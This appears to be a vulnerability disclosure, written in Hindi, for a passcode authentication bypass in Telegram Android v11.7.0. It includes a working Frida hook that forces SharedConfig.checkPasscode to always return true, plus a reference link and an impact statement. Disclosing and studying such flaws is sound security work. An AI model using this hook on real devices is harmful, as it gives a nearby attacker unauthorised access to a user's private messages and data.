
Frida-आधारित प्रमाण-की-अवधारणा जो SharedConfig.checkPasscode को हुक करके हमेशा true लौटाने के लिए Telegram Android में प्रमाणीकरण बाईपास प्रदर्शित करती है, जिससे अनधिकृत पहुंच सक्षम होती है।
Telegram Android APK v.11.7.0 के SharedConfig वर्ग में एक समस्या एक भौतिक निकट आक्रमणकारी को checkPasscode विधि के रिटर्न मान में हेरफेर करके प्रमाणीकरण को बायपास करने और विशेषाधिकार बढ़ाने की अनुमति देती है।
प्रमाणीकरण बाईपास
Telegram
Telegram android apk v.11.7.0
org.telegram.messenger.SharedConfig
Java.perform(function() {
// Locate the SharedConfig class in the target application
var PassCodeActivity = Java.use('org.telegram.messenger.SharedConfig');
// Hook the checkPasscode method to modify its behavior
PassCodeActivity.checkPasscode.implementation = function(passcode) {
// Bypass the actual passcode check by always returning true
return true;
};
});
https://drive.google.com/file/d/1-lW1IQiCyj-8UXZOTedYPGPhQwfMLX4M/view?usp=sharing
यह भेद्यता एक क्लाइंट-साइड प्रमाणीकरण बाईपास समस्या है। यह उन उपयोगकर्ताओं को प्रभावित करता है जो संवेदनशील डेटा को सुरक्षित करने या विशिष्ट ऐप कार्यक्षमताओं तक पहुंच को प्रतिबंधित करने के लिए पासकोड सुविधा पर निर्भर करते हैं। इस खामी का शोषण करके, एक भौतिक निकट आक्रमणकारी पासकोड सत्यापन प्रक्रिया में हेरफेर कर सकता है, प्रमाणीकरण को बायपास कर सकता है, और ऐप के संरक्षित क्षेत्रों तक अनधिकृत पहुंच प्राप्त कर सकता है। इससे संवेदनशील उपयोगकर्ता डेटा का खुलासा या एप्लिकेशन के भीतर अनधिकृत कार्य हो सकते हैं।